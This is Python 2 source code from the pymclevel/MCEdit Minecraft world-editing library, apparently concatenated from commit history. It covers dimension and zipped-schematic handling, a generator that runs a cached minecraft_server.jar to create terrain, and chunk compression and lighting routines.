playerTag['abilities']['invulnerable'] = TAG_Byte(0)
def setPlayerGameType(self, gametype, player="Player"):
playerTag = self.getPlayerTag(player)
# This annoyingly works differently between single- and multi-player.
if player == "Player":
self.GameType = gametype
self.setPlayerAbilities(gametype, player)
else:
playerTag['playerGameType'] = TAG_Int(gametype)
self.setPlayerAbilities(gametype, player)
def getPlayerGameType(self, player="Player"):
if player == "Player":
return self.GameType
else:
playerTag = self.getPlayerTag(player)
return playerTag["playerGameType"].value
class MCAlphaDimension (MCInfdevOldLevel):
def __init__(self, parentWorld, dimNo, create=False):
filename = os.path.join(parentWorld.worldDir, "DIM" + str(int(dimNo)))
self.parentWorld = parentWorld;
MCInfdevOldLevel.__init__(self, filename, create)
self.dimNo = dimNo
self.filename = parentWorld.filename
self.playersDir = parentWorld.playersDir;
self.players = parentWorld.players
self.playerTagCache = parentWorld.playerTagCache
@property
def root_tag(self): return self.parentWorld.root_tag;
def __str__(self):
return "MCAlphaDimension({0}, {1})".format(self.parentWorld, self.dimNo)
def loadLevelDat(self, create=False, random_seed=None, last_played=None):
pass;
def preloadDimensions(self):
pass
def create(self, *args, **kw):
if not os.path.exists(self.worldDir):
os.mkdir(self.worldDir)
dimensionNames = { -1: "Nether", 1: "The End"};
@property
def displayName(self):
return u"{0} ({1})".format(self.parentWorld.displayName,
self.dimensionNames.get(self.dimNo, "Dimension %d" % self.dimNo))
def saveInPlace(self, saveSelf=False):
"""saving the dimension will save the parent world, which will save any
other dimensions that need saving. the intent is that all of them can
stay loaded at once for fast switching """
if saveSelf:
MCInfdevOldLevel.saveInPlace(self);
else:
self.parentWorld.saveInPlace();
from zipfile import ZipFile, is_zipfile
import tempfile
class ZipSchematic (MCInfdevOldLevel):
def __init__(self, filename):
tempdir = tempfile.mktemp("schematic")
zf = ZipFile(filename)
self.zipfile = zf
zf.extract("level.dat", tempdir)
MCInfdevOldLevel.__init__(self, tempdir)
self.filename = filename
try:
schematicDat = os.path.join(tempdir, "schematic.dat")
with closing(self.zipfile.open("schematic.dat")) as f:
schematicDat = nbt.load(buf=gunzip(f.read()))
self.Width = schematicDat['Width'].value;
self.Height = schematicDat['Height'].value;
self.Length = schematicDat['Length'].value;
except Exception, e:
print "Exception reading schematic.dat, skipping: {0!r}".format(e)
self.Width = 0
self.Height = 128
self.Length = 0
if "Materials" in schematicDat:
self.materials = namedMaterials[schematicDat["Materials"].value]
def close(self):
MCInfdevOldLevel.close(self)
self.zipfile.close()
shutil.rmtree(self.worldDir, True)
def getWorldBounds(self):
return BoundingBox((0, 0, 0), (self.Width, self.Height, self.Length))
@classmethod
def _isLevel(cls, filename):
return is_zipfile(filename)
def _loadChunk(self, chunk):
if self.version:
return MCInfdevOldLevel._loadChunk(self, chunk)
else:
cdata = self.zipfile.read(chunk.chunkFilename)
chunk.compressedTag = cdata
chunk.decompress()
def _saveChunk(self, chunk):
if self.version:
return MCInfdevOldLevel._saveChunk(self, chunk)
else:
raise NotImplementedError, "Cannot save chunk-format zipfiles!"
def saveInPlace(self):
self.saveToFile(self.filename)
def saveToFile(self, filename):
tempfile = filename + ".new"
from schematic import zipdir
zipdir(self.worldDir, tempfile)
if os.path.exists(filename):
os.remove(filename)
shutil.copy(tempfile, filename)
def containsChunk(self, cx, cz):
return (cx, cz) in self.allChunks
def preloadRegions(self):
self.zipfile.extractall(self.worldDir)
self.regionFiles = {}
MCInfdevOldLevel.preloadRegions(self)
def preloadChunkPaths(self):
info(u"Scanning for chunks...")
self._allChunks = set()
infos = self.zipfile.infolist()
names = [i.filename.split('/') for i in infos]
goodnames = [n for n in names if len(n) == 3 and n[0] in self.dirhashes and n[1] in self.dirhashes]
for name in goodnames:
c = name[2].split('.')
if len(c) == 4 and c[0].lower() == 'c' and c[3].lower() == 'dat':
try:
cx, cz = (decbase36(c[1]), decbase36(c[2]))
except Exception, e:
info('Skipped file {0} ({1})'.format('.'.join(c), e))
continue
#self._loadedChunks[ (cx, cz) ] = InfdevChunk(self, (cx, cz));
self._allChunks.add((cx, cz))
info(u"Found {0} chunks.".format(len(self._allChunks)))
def preloadDimensions(self):
pass
def loadLevelDat(self, create=False, random_seed=None, last_played=None):
if create:
raise NotImplementedError, "Cannot save zipfiles yet!"
with closing(self.zipfile.open("level.dat")) as f:
with closing(gzip.GzipFile(fileobj=StringIO(f.read()))) as g:
self.root_tag = nbt.load(buf=g.read())
def chunkFilename(self, x, z):
s = "/".join((self.dirhash(x), self.dirhash(z),
"c.%s.%s.dat" % (base36(x), base36(z))));
return s;
popen doesn't accept a unicode for its cwd parameter (doesn't use wchar api?), so encode it. fixes generator failure when startingDir has non-ascii chars
'''
Created on Jul 22, 2011
@author: Rio
'''
from mclevelbase import *
from collections import deque;
import time
import zlib
import struct
import shutil
import subprocess
import sys
import urllib
import tempfile
from os.path import join, dirname, basename
log = logging.getLogger(__name__)
warn, error, info, debug = log.warn, log.error, log.info, log.debug
#infinite
Level = 'Level'
BlockData = 'BlockData'
BlockLight = 'BlockLight'
SkyLight = 'SkyLight'
HeightMap = 'HeightMap'
TerrainPopulated = 'TerrainPopulated'
LastUpdate = 'LastUpdate'
xPos = 'xPos'
zPos = 'zPos'
Data = 'Data'
SpawnX = 'SpawnX'
SpawnY = 'SpawnY'
SpawnZ = 'SpawnZ'
LastPlayed = 'LastPlayed'
RandomSeed = 'RandomSeed'
SizeOnDisk = 'SizeOnDisk' #maybe update this?
Time = 'Time'
Player = 'Player'
__all__ = ["ZeroChunk", "InfdevChunk", "ChunkedLevelMixin", "MCInfdevOldLevel", "MCAlphaDimension", "ZipSchematic"]
import re
convert = lambda text: int(text) if text.isdigit() else text
alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]
def sort_nicely(l):
""" Sort the given list in the way that humans expect.
"""
l.sort(key=alphanum_key)
# Thank you, Stackoverflow
# http://stackoverflow.com/questions/377017/test-if-executable-exists-in-python
def which(program):
def is_exe(fpath):
return os.path.exists(fpath) and os.access(fpath, os.X_OK)
fpath, _fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
if sys.platform == "win32":
if "SYSTEMROOT" in os.environ:
root = os.environ["SYSTEMROOT"]
exe_file = os.path.join(root, program)
if is_exe(exe_file):
return exe_file
if "PATH" in os.environ:
for path in os.environ["PATH"].split(os.pathsep):
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
if sys.platform == "win32":
appSupportDir = os.path.join(appDataDir, u"pymclevel")
elif sys.platform == "darwin":
appSupportDir = os.path.expanduser(u"~/Library/Application Support/pymclevel/")
else:
appSupportDir = os.path.expanduser(u"~/.pymclevel")
class ServerJarStorage(object):
defaultCacheDir = os.path.join(appSupportDir, u"ServerJarStorage")
def __init__(self, cacheDir=None):
if cacheDir is None:
cacheDir = self.defaultCacheDir
self.cacheDir = cacheDir
if not os.path.exists(self.cacheDir):
os.makedirs(self.cacheDir)
readme = os.path.join(self.cacheDir, "README.TXT")
if not os.path.exists(readme):
with file(readme, "w") as f:
f.write("""
About this folder:
This folder is used by MCEdit and pymclevel to store different versions of the
Minecraft Server to use for terrain generation. It should have one or more
subfolders, one for each version of the server. Each subfolder must hold at
least one file named minecraft_server.jar, and the subfolder's name should
have the server's version plus the names of any installed mods.
There may already be a subfolder here (for example, "Beta 1.7.3") if you have
used the Chunk Create feature in MCEdit to create chunks using the server.
Version numbers can be automatically detected. If you place one or more
minecraft_server.jar files in this folder, they will be placed automatically
into well-named subfolders the next time you run MCEdit. If a file's name
begins with "minecraft_server" and ends with ".jar", it will be detected in
this way.
""")
self.reloadVersions()
def reloadVersions(self):
cacheDirList = os.listdir(self.cacheDir)
self.versions = list(reversed(sorted([v for v in cacheDirList if os.path.exists(self.jarfileForVersion(v))], key=alphanum_key)))
if MCServerChunkGenerator.javaExe:
for f in cacheDirList:
p = os.path.join(self.cacheDir, f)
if f.startswith("minecraft_server") and f.endswith(".jar") and os.path.isfile(p):
print "Unclassified minecraft_server.jar found in cache dir. Discovering version number..."
self.cacheNewVersion(p)
os.remove(p)
print "Minecraft_Server.jar storage initialized."
print u"Each server is stored in a subdirectory of {0} named with the server's version number".format(self.cacheDir)
print "Cached servers: ", self.versions
def downloadCurrentServer(self):
print "Downloading the latest Minecraft Server..."
try:
(filename, headers) = urllib.urlretrieve("http://www.minecraft.net/download/minecraft_server.jar")
except Exception, e:
print "Error downloading server: {0!r}".format(e)
return
self.cacheNewVersion(filename, allowDuplicate=False)
def cacheNewVersion(self, filename, allowDuplicate=True):
""" Finds the version number from the server jar at filename and copies
it into the proper subfolder of the server jar cache folder"""
version = MCServerChunkGenerator._serverVersionFromJarFile(filename)
print "Found version ", version
versionDir = os.path.join(self.cacheDir, version)
i = 1
newVersionDir = versionDir
while os.path.exists(newVersionDir):
if not allowDuplicate: return
newVersionDir = versionDir + " (" + str(i) + ")"
i += 1
os.mkdir(newVersionDir)
shutil.copy2(filename, os.path.join(newVersionDir, "minecraft_server.jar"))
if version not in self.versions:
self.versions.append(version)
def jarfileForVersion(self, v):
return os.path.join(self.cacheDir, v, "minecraft_server.jar").encode(sys.getfilesystemencoding())
def checksumForVersion(self, v):
jf = self.jarfileForVersion(v)
with file(jf, "rb") as f:
import hashlib
return (hashlib.md5(f.read()).hexdigest())
broken_versions = ["Beta 1.9 Prerelease {0}".format(i) for i in (1,2,3)]
@property
def latestVersion(self):
if len(self.versions) == 0: return None
return max( (v for v in self.versions if v not in self.broken_versions), key=alphanum_key)
def getJarfile(self, version=None):
if len(self.versions) == 0:
print "No servers found in cache."
self.downloadCurrentServer()
version = version or self.latestVersion
if version not in self.versions: return None
return self.jarfileForVersion(version)
class JavaNotFound(RuntimeError): pass
class VersionNotFound(RuntimeError): pass
def readProperties(filename):
if not os.path.exists(filename): return {}
with file(filename) as f:
properties = dict((line.split("=", 2) for line in (l.strip() for l in f) if not line.startswith("#")))
return properties
def saveProperties(filename, properties):
with file(filename, "w") as f:
for k, v in properties.iteritems():
f.write("{0}={1}\n".format(k, v))
def findJava():
if sys.platform == "win32":
javaExe = which("java.exe")
if javaExe is None:
KEY_NAME = "HKLM\SOFTWARE\JavaSoft\Java Runtime Environment"
try:
p = subprocess.Popen(["REG", "QUERY", KEY_NAME, "/v", "CurrentVersion"], stdout=subprocess.PIPE, universal_newlines=True)
o, e = p.communicate()
lines = o.split("\n")
for l in lines:
l = l.strip()
if l.startswith("CurrentVersion"):
words = l.split(None, 2)
version = words[-1]
p = subprocess.Popen(["REG", "QUERY", KEY_NAME + "\\" + version, "/v", "JavaHome"], stdout=subprocess.PIPE, universal_newlines=True)
o, e = p.communicate()
lines = o.split("\n")
for l in lines:
l = l.strip()
if l.startswith("JavaHome"):
w = l.split(None, 2)
javaHome = w[-1]
javaExe = os.path.join(javaHome, "bin", "java.exe")
print "RegQuery: java.exe found at ", javaExe
break
except Exception, e:
print "Error while locating java.exe using the Registry: ", repr(e)
else:
javaExe = which("java")
return javaExe
class MCServerChunkGenerator(object):
"""Generates chunks using minecraft_server.jar. Uses a ServerJarStorage to
store different versions of minecraft_server.jar in an application support
folder.
from pymclevel import *
Example usage:
gen = MCServerChunkGenerator() # with no arguments, use the newest
# server version in the cache, or download
# the newest one automatically
level = loadWorldNamed("MyWorld")
gen.generateChunkInLevel(level, 12, 24)
Using an older version:
gen = MCServerChunkGenerator("Beta 1.6.5")
"""
defaultJarStorage = None
javaExe = findJava()
jarStorage = None
tempWorldCache = {}
def __init__(self, version=None, jarfile=None, jarStorage=None):
self.jarStorage = jarStorage or self.getDefaultJarStorage()
if self.javaExe is None:
raise JavaNotFound, "Could not find java. Please check that java is installed correctly. (Could not find java in your PATH environment variable.)"
if jarfile is None:
jarfile = self.jarStorage.getJarfile(version)
if jarfile is None:
raise VersionNotFound, "Could not find minecraft_server.jar for version {0}. Please make sure that a minecraft_server.jar is placed under {1} in a subfolder named after the server's version number.".format(version or "(latest)", self.jarStorage.cacheDir)
self.serverJarFile = jarfile
self.serverVersion = version or self._serverVersion()
@classmethod
def getDefaultJarStorage(cls):
if cls.defaultJarStorage is None:
cls.defaultJarStorage = ServerJarStorage()
return cls.defaultJarStorage
@classmethod
def clearWorldCache(cls):
cls.tempWorldCache = {}
for tempDir in os.listdir(cls.worldCacheDir):
t = os.path.join(cls.worldCacheDir, tempDir)
if os.path.isdir(t):
shutil.rmtree(t)
def createReadme(self):
readme = os.path.join(self.worldCacheDir, "README.TXT")
if not os.path.exists(readme):
with file(readme, "w") as f:
f.write("""
About this folder:
This folder is used by MCEdit and pymclevel to cache levels during terrain
generation. Feel free to delete it for any reason.
""")
worldCacheDir = os.path.join(tempfile.gettempdir(), "pymclevel_MCServerChunkGenerator")
def tempWorldForLevel(self, level):
#tempDir = tempfile.mkdtemp("mclevel_servergen")
tempDir = os.path.join(self.worldCacheDir, self.jarStorage.checksumForVersion(self.serverVersion), str(level.RandomSeed))
propsFile = os.path.join(tempDir, "server.properties")
properties = readProperties(propsFile)
tempWorld = self.tempWorldCache.get((self.serverVersion, level.RandomSeed))
if tempWorld is None:
if not os.path.exists(tempDir):
os.makedirs(tempDir)
self.createReadme()
worldName = "world"
worldName = properties.setdefault("level-name", worldName)
tempWorldDir = os.path.join(tempDir, worldName)
tempWorld = MCInfdevOldLevel(tempWorldDir, create=True, random_seed=level.RandomSeed)
del tempWorld.version # for compatibility with older servers. newer ones will set it again without issue.
self.tempWorldCache[self.serverVersion, level.RandomSeed] = tempWorld
if level.dimNo == 0:
properties["allow-nether"] = "false"
else:
tempWorld = tempWorld.getDimension(level.dimNo)
properties["allow-nether"] = "true"
properties["server-port"] = int(32767 + random.random() * 32700)
saveProperties(propsFile, properties)
return (tempWorld, tempDir)
def generateAtPosition(self, tempWorld, tempDir, cx, cz):
return exhaust(self.generateAtPositionIter(tempWorld, tempDir, cx, cz))
def generateAtPositionIter(self, tempWorld, tempDir, cx, cz, simulate = False):
tempWorld.setPlayerSpawnPosition((cx * 16, 64, cz * 16))
tempWorld.saveInPlace()
tempWorld.unloadRegions()
startTime = time.time()
proc = self.runServer(tempDir)
while proc.poll() is None:
line = proc.stderr.readline().strip()
info(line)
yield line
if "[INFO] Done" in line:
if simulate:
duration = time.time() - startTime
simSeconds = int(duration) + 1
for i in range(simSeconds):
# process tile ticks
yield "%2d/%2d: Simulating the world for a little bit..." % (i, simSeconds)
time.sleep(1)
proc.stdin.write("stop\n")
proc.wait()
break
if "FAILED TO BIND" in line:
proc.kill()
proc.wait()
raise RuntimeError, "Server failed to bind to port!"
stdout, _ = proc.communicate()
if "Could not reserve enough space" in stdout and not MCServerChunkGenerator.lowMemory:
MCServerChunkGenerator.lowMemory = True
for i in self.generateAtPositionIter(tempWorld, tempDir, cx, cz):
yield i
(tempWorld.parentWorld or tempWorld).loadLevelDat() #reload version number
def copyChunkAtPosition(self, tempWorld, level, cx, cz):
if level.containsChunk(cx, cz): return
try:
tempChunk = tempWorld.getChunk(cx, cz)
except ChunkNotPresent, e:
raise ChunkNotPresent, "While generating a world in {0} using server {1} ({2!r})".format(tempWorld, self.serverJarFile, e), sys.exc_traceback
tempChunk.decompress()
tempChunk.unpackChunkData()
root_tag = tempChunk.root_tag
if not level.containsChunk(cx, cz):
level.createChunk(cx, cz)
chunk = level.getChunk(cx, cz)
chunk.decompress()
chunk.unpackChunkData()
chunk.root_tag = root_tag #xxx tag swap, could copy blocks and entities and chunk attrs instead?
chunk.dirty = True
chunk.compress()
chunk.save()
chunk.unload()
tempChunk.compress()
tempChunk.unload()
def generateChunkInLevel(self, level, cx, cz):
assert isinstance(level, MCInfdevOldLevel)
tempWorld, tempDir = self.tempWorldForLevel(level)
self.generateAtPosition(tempWorld, tempDir, cx, cz)
self.copyChunkAtPosition(tempWorld, level, cx, cz)
minRadius = 5
maxRadius = 20
def createLevel(self, level, box, simulate = False, **kw):
return exhaust(self.createLevelIter(level, box, simulate, **kw))
def createLevelIter(self, level, box, simulate = False, **kw):
if isinstance(level, basestring):
filename = level
level = MCInfdevOldLevel(filename, create=True, **kw)
assert isinstance(level, MCInfdevOldLevel)
minRadius = self.minRadius
genPositions = list(itertools.product(
xrange(box.mincx, box.maxcx, minRadius * 2),
xrange(box.mincz, box.maxcz, minRadius * 2)))
for i, (cx,cz) in enumerate(genPositions):
info("Generating at %s" % ((cx,cz),))
parentDir = dirname(level.worldDir)
propsFile = join(parentDir, "server.properties")
props = readProperties(join(dirname(self.serverJarFile), "server.properties"))
props["level-name"] = basename(level.worldDir)
props["server-port"] = int(32767 + random.random() * 32700)
saveProperties(propsFile, props)
for p in self.generateAtPositionIter(level, parentDir, cx, cz, simulate):
yield i, len(genPositions), p
level.unloadRegions()
def generateChunksInLevel(self, level, chunks):
return exhaust(self.generateChunksInLevelIter(level, chunks))
def generateChunksInLevelIter(self, level, chunks, simulate = False):
assert isinstance(level, MCInfdevOldLevel)
tempWorld, tempDir = self.tempWorldForLevel(level)
startLength = len(chunks)
minRadius = self.minRadius
maxRadius = self.maxRadius
chunks = set(chunks)
while len(chunks):
length = len(chunks)
centercx, centercz = chunks.pop()
chunks.add((centercx, centercz))
#assume the generator always generates at least an 11x11 chunk square.
centercx += minRadius
centercz += minRadius
#boxedChunks = [cPos for cPos in chunks if inBox(cPos)]
print "Generating {0} chunks out of {1} starting from {2}".format("XXX", len(chunks), (centercx, centercz))
yield startLength - len(chunks), startLength
#chunks = [c for c in chunks if not inBox(c)]
for p in self.generateAtPositionIter(tempWorld, tempDir, centercx, centercz, simulate):
yield startLength - len(chunks), startLength, p
i=0
for cx, cz in itertools.product(
xrange(centercx-maxRadius, centercx+maxRadius),
xrange(centercz-maxRadius, centercz+maxRadius)):
if level.containsChunk(cx,cz):
chunks.discard((cx,cz))
elif ((cx,cz) in chunks
and tempWorld.containsChunk(cx, cz)
and tempWorld.getChunk(cx,cz).TerrainPopulated
):
self.copyChunkAtPosition(tempWorld, level, cx, cz)
i+= 1
chunks.discard((cx,cz))
yield startLength - len(chunks), startLength
if length == len(chunks):
print "No chunks were generated. Aborting."
break
level.saveInPlace()
def runServer(self, startingDir):
if isinstance(startingDir, unicode): startingDir = startingDir.encode(sys.getfilesystemencoding())
return self._runServer(startingDir, self.serverJarFile)
lowMemory = False
@classmethod
def _runServer(cls, startingDir, jarfile):
info("Starting server %s in %s", jarfile, startingDir)
if cls.lowMemory: memflags = []
else: memflags = ["-Xmx1024M", "-Xms1024M", ]
proc = subprocess.Popen([cls.javaExe, "-Djava.awt.headless=true"] + memflags + ["-jar", jarfile],
executable=cls.javaExe,
cwd=startingDir,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
)
return proc
def _serverVersion(self):
return self._serverVersionFromJarFile(self.serverJarFile)
@classmethod
def _serverVersionFromJarFile(cls, jarfile):
tempdir = tempfile.mkdtemp("mclevel_servergen")
proc = cls._runServer(tempdir, jarfile)
version = "Unknown"
#out, err = proc.communicate()
#for line in err.split("\n"):
while proc.poll() is None:
line = proc.stderr.readline()
if "Preparing start region" in line: break
if "Starting minecraft server version" in line:
version = line.split("Starting minecraft server version")[1].strip()
break
if proc.returncode is None:
try:
proc.kill()
except WindowsError:
pass #access denied, process already terminated
proc.wait()
shutil.rmtree(tempdir)
if ";)" in version: version = version.replace(";)", "") #Damnit, Jeb!
# Versions like "0.2.1" are alphas, and versions like "1.0.0" without "Beta" are releases
if version[0] == "0":
version = "Alpha " + version
try:
if int(version[0]) > 0:
version = "Release " + version
except ValueError:
pass
return version
_zeros = {}
def ZeroChunk(height=512):
z = _zeros.get(height)
if z is None:
z = _zeros[height] = _ZeroChunk(height)
return z
class _ZeroChunk(object):
" a placebo for neighboring-chunk routines "
def compress(self): pass
def load(self): pass
def __init__(self, height=512):
zeroChunk = zeros((16, 16, height), uint8)
whiteLight = zeroChunk + 15;
self.Blocks = zeroChunk
self.BlockLight = whiteLight
self.SkyLight = whiteLight
self.Data = zeroChunk
class InfdevChunk(EntityLevel):
""" This is a 16x16xH chunk in an (infinite) world.
The properties Blocks, Data, SkyLight, BlockLight, and Heightmap
are ndarrays containing the respective blocks in the chunk file.
Each array is indexed [x,z,y]. The Data, Skylight, and BlockLight
arrays are automatically unpacked from nibble arrays into byte arrays
for better handling.
"""
@property
def filename(self):
if self.world.version:
cx, cz = self.chunkPosition
rx, rz = cx >> 5, cz >> 5
rf = self.world.regionFiles[rx, rz]
offset = rf.getOffset(cx & 0x1f, cz & 0x1f)
return u"{region} index {index} sector {sector} length {length} format {format}".format(
region=os.path.basename(self.world.regionFilename(rx, rz)),
sector=offset >> 8,
length = offset & 0xff,
index=4 * ((cx & 0x1f) + ((cz & 0x1f) * 32)),
format=["???", "gzip", "deflate"][self.compressMode])
else:
return self.chunkFilename
dirty = False;
needsLighting = False
compressedTag = None
root_tag = None
def __init__(self, world, chunkPosition, create=False):
self.world = world;
self.chunkPosition = chunkPosition;
self.chunkFilename = world.chunkFilename(*chunkPosition)
if self.world.version:
self.compressMode = MCRegionFile.VERSION_DEFLATE
else:
self.compressMode = MCRegionFile.VERSION_GZIP
if create:
self.create();
else:
if not world.containsChunk(*chunkPosition):
raise ChunkNotPresent("Chunk {0} not found", self.chunkPosition)
@property
def materials(self):
return self.world.materials
@classmethod
def compressTagGzip(cls, root_tag):
buf = StringIO()
with closing(gzip.GzipFile(fileobj=buf, mode='wb', compresslevel=2)) as gzipper:
root_tag.save(buf=gzipper)
return buf.getvalue()
@classmethod
def compressTagDeflate(cls, root_tag):
buf = StringIO()
root_tag.save(buf=buf)
return deflate(buf.getvalue())
def _compressChunk(self):
root_tag = self.root_tag
if root_tag is None: return
if self.compressMode == MCRegionFile.VERSION_GZIP:
self.compressedTag = self.compressTagGzip(root_tag)
if self.compressMode == MCRegionFile.VERSION_DEFLATE:
self.compressedTag = self.compressTagDeflate(root_tag)
self.root_tag = None
def decompressTagGzip(self, data):
return nbt.load(buf=gunzip(data))
def decompressTagDeflate(self, data):
return nbt.load(buf=inflate(data))
def _decompressChunk(self):
data = self.compressedTag
if self.compressMode == MCRegionFile.VERSION_GZIP:
self.root_tag = self.decompressTagGzip(data)
if self.compressMode == MCRegionFile.VERSION_DEFLATE:
self.root_tag = self.decompressTagDeflate(data)
def compressedSize(self):
"return the size of the compressed data for this level, in bytes."
self.compress();
if self.compressedTag is None: return 0
return len(self.compressedTag)
def sanitizeBlocks(self):
#change grass to dirt where needed so Minecraft doesn't flip out and die
grass = self.Blocks == self.materials.Grass.ID
grass |= self.Blocks == self.materials.Dirt.ID
badgrass = grass[:, :, 1:] & grass[:, :, :-1]
self.Blocks[:, :, :-1][badgrass] = self.materials.Dirt.ID
#remove any thin snow layers immediately above other thin snow layers.
#minecraft doesn't flip out, but it's almost never intended
if hasattr(self.materials, "SnowLayer"):
snowlayer = self.Blocks == self.materials.SnowLayer.ID
badsnow = snowlayer[:, :, 1:] & snowlayer[:, :, :-1]
self.Blocks[:, :, 1:][badsnow] = self.materials.Air.ID
def compress(self):
if not self.dirty:
#if we are not dirty, just throw the
#uncompressed tag structure away. rely on the OS disk cache.
self.root_tag = None
else:
if self.root_tag is not None:
self.sanitizeBlocks() #xxx
self.packChunkData()
self._compressChunk()
self.world.chunkDidCompress(self);
def decompress(self):
"""called when accessing attributes decorated with @decompress_first"""
if not self in self.world.decompressedChunkQueue:
if self.root_tag != None: return
if self.compressedTag is None:
if self.root_tag is None:
self.load();
else:
return;
try:
self._decompressChunk()
except Exception, e:
error(u"Malformed NBT data in file: {0} ({1})".format(self.filename, e))
if self.world: self.world.malformedChunk(*self.chunkPosition);
raise ChunkMalformed, (e,), sys.exc_info()[2]
try:
self.shapeChunkData()
except KeyError, e:
error(u"Incorrect chunk format in file: {0} ({1})".format(self.filename, e))
if self.world: self.world.malformedChunk(*self.chunkPosition);
raise ChunkMalformed, (e,), sys.exc_info()[2]
self.dataIsPacked = True;
self.world.chunkDidDecompress(self);
def __str__(self):
return u"InfdevChunk, coords:{0}, world: {1}, D:{2}, L:{3}".format(self.chunkPosition, self.world.displayName, self.dirty, self.needsLighting)
def create(self):
(cx, cz) = self.chunkPosition;
chunkTag = nbt.TAG_Compound()
chunkTag.name = ""
levelTag = nbt.TAG_Compound()
chunkTag[Level] = levelTag
levelTag[TerrainPopulated] = TAG_Byte(1)
levelTag[xPos] = TAG_Int(cx)
levelTag[zPos] = TAG_Int(cz)
levelTag[LastUpdate] = TAG_Long(0);
levelTag[BlockLight] = TAG_Byte_Array()
levelTag[BlockLight].value = zeros(16 * 16 * self.world.Height / 2, uint8)
levelTag[Blocks] = TAG_Byte_Array()
levelTag[Blocks].value = zeros(16 * 16 * self.world.Height, uint8)
levelTag[Data] = TAG_Byte_Array()
levelTag[Data].value = zeros(16 * 16 * self.world.Height / 2, uint8)
levelTag[SkyLight] = TAG_Byte_Array()
levelTag[SkyLight].value = zeros(16 * 16 * self.world.Height / 2, uint8)
levelTag[SkyLight].value[:] = 255
if self.world.Height <= 256:
levelTag[HeightMap] = TAG_Byte_Array()
levelTag[HeightMap].value = zeros(16 * 16, uint8)
else:
levelTag[HeightMap] = TAG_Int_Array()
levelTag[HeightMap].value = zeros(16 * 16, uint32).newbyteorder()
levelTag[Entities] = TAG_List()
levelTag[TileEntities] = TAG_List()
#levelTag["Creator"] = TAG_String("MCEdit-" + release.release);
#empty lists are seen in the wild with a list.TAG_type for a list of single bytes,
#even though these contain TAG_Compounds
self.root_tag = chunkTag
self.shapeChunkData();
self.dataIsPacked = True;
self.dirty = True;
self.save();
def save(self):
""" does not recalculate any data or light """
self.compress()
if self.dirty:
debug(u"Saving chunk: {0}".format(self))
self.world._saveChunk(self)
debug(u"Saved chunk {0}".format(self))
self.dirty = False;
def load(self):
""" If the chunk is unloaded, calls world._loadChunk to set root_tag and
compressedTag, then unpacks the chunk fully"""
if self.root_tag is None and self.compressedTag is None:
try:
self.world._loadChunk(self)
self.dataIsPacked = True;
self.shapeChunkData()
self.unpackChunkData()
except Exception, e:
error(u"Incorrect chunk format in file: {0} ({1})".format(self.filename, e))
if self.world: self.world.malformedChunk(*self.chunkPosition);
raise ChunkMalformed, (e,), sys.exc_info()[2]
self.world.chunkDidLoad(self)
self.world.chunkDidDecompress(self);
def unload(self):
""" Frees the chunk's memory. Will not save to disk. Unloads completely
if the chunk does not need to be saved."""
self.compress();
if not self.dirty:
self.compressedTag = None;
self.world.chunkDidUnload(self)
def isLoaded(self):
#we're loaded if we have our tag data in ram
#and we don't have to go back to the disk for it.
return not (self.compressedTag is None and self.root_tag is None)
def isCompressed(self):
return self.isLoaded() and self.root_tag == None
def generateHeightMap(self):
extractLightMap(self.materials, self.Blocks, self.HeightMap)
def chunkChanged(self, calcLighting=True):
""" You are required to call this function after you are done modifying
the chunk. Pass False for calcLighting if you know your changes will
not change any lights."""
if not self.isLoaded(): return;
self.dirty = True;
self.needsLighting = calcLighting or self.needsLighting;
self.generateHeightMap();
if calcLighting:
self.genFastLights()
def genFastLights(self):
self.SkyLight[:] = 0;
if self.world.dimNo in (-1, 1):
return #no light in nether or the end
blocks = self.Blocks;
la = self.world.materials.lightAbsorption
skylight = self.SkyLight;
heightmap = self.HeightMap;
for x, z in itertools.product(xrange(16), xrange(16)):
skylight[x, z, heightmap[z, x]:] = 15
lv = 15;
for y in reversed(range(heightmap[z, x])):
lv -= (la[blocks[x, z, y]] or 1)
if lv <= 0:
break;
skylight[x, z, y] = lv;
def unpackChunkData(self):
if not self.dataIsPacked: return
""" for internal use. call getChunk and compressChunk to load, compress, and unpack chunks automatically """
for key in (SkyLight, BlockLight, Data):
dataArray = self.root_tag[Level][key].value
s = dataArray.shape
assert s[2] == self.world.Height / 2;
#unpackedData = insert(dataArray[...,newaxis], 0, 0, 3)
unpackedData = zeros((s[0], s[1], s[2] * 2), dtype='uint8')
unpackedData[:, :, ::2] = dataArray
unpackedData[:, :, ::2] &= 0xf
unpackedData[:, :, 1::2] = dataArray
unpackedData[:, :, 1::2] >>= 4
self.root_tag[Level][key].value = unpackedData
self.dataIsPacked = False;
def packChunkData(self):
if self.dataIsPacked: return
if self.root_tag is None:
warn(u"packChunkData called on unloaded chunk: {0}".format(self.chunkPosition))
return;
for key in (SkyLight, BlockLight, Data):
dataArray = self.root_tag[Level][key].value
assert dataArray.shape[2] == self.world.Height;
unpackedData = self.root_tag[Level][key].value.reshape(16, 16, self.world.Height / 2, 2)
unpackedData[..., 1] <<= 4
unpackedData[..., 1] |= unpackedData[..., 0]
self.root_tag[Level][key].value = array(unpackedData[:, :, :, 1])
self.dataIsPacked = True;
def shapeChunkData(self):
"""Applies the chunk shape to all of the data arrays
in the chunk tag. used by chunk creation and loading"""
chunkTag = self.root_tag
chunkSize = 16
if not hasattr(self.world, 'HeightOverride'):
length = chunkTag[Level][Blocks].value.ravel().shape[0]
height = length / (chunkSize * chunkSize)
self.world.Height = height
self.world.HeightOverride = True
self.world._bounds = None
chunkTag[Level][Blocks].value.shape = (chunkSize, chunkSize, self.world.Height)
chunkTag[Level][HeightMap].value.shape = (chunkSize, chunkSize);
chunkTag[Level][SkyLight].value.shape = (chunkSize, chunkSize, self.world.Height / 2)
chunkTag[Level][BlockLight].value.shape = (chunkSize, chunkSize, self.world.Height / 2)
chunkTag[Level]["Data"].value.shape = (chunkSize, chunkSize, self.world.Height / 2)
if TileEntities not in chunkTag[Level]:
chunkTag[Level][TileEntities] = TAG_List();
if Entities not in chunkTag[Level]:
chunkTag[Level][Entities] = TAG_List();
def addEntity(self, entityTag):
def doubleize(name):
if name in entityTag:
m = entityTag[name]
entityTag[name] = TAG_List([TAG_Double(i.value) for i in m])
doubleize("Motion")
doubleize("Position")
self.dirty = True
return super(InfdevChunk, self).addEntity(entityTag)
def removeEntitiesInBox(self, box):
self.dirty = True;
